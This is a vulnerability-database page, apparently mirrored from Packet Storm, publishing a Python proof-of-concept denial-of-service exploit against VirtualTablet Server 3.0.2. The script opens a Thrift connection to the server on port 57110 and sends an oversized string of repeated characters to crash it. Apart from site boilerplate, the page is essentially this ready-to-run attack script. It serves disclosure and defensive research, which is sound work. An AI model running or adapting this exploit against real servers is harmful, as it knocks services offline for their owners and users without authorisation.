Lucene search
K

VirtualTablet Server 3.0.2 Denial Of Service

🗓️ 30 Apr 2020 00:00:00Reported by Dolev FarhiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 83 Views

VirtualTablet Server 3.0.2 Denial Of Service attack using Thrift library

Code
`# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)  
# Author: Dolev Farhi  
# Date: 2020-04-29  
# Vulnerable version: 3.0.2 (14)  
# Link: http://www.sunnysidesoft.com/  
# CVE: N/A  
  
  
from thrift import Thrift  
from thrift.transport import TSocket  
from thrift.transport import TTransport  
from thrift.protocol import TBinaryProtocol  
from pygen.example import Example  
  
host = '192.168.1.1'  
port = 57110  
  
try:  
transport = TSocket.TSocket(host, port)  
transport = TTransport.TBufferedTransport(transport)  
protocol = TBinaryProtocol.TBinaryProtocol(transport)  
client = Example.Client(protocol)  
transport.open()  
client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')  
transport.close()  
  
except Thrift.TException as tx:  
print(tx.message)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Apr 2020 00:00Current
7.4High risk
Vulners AI Score7.4
83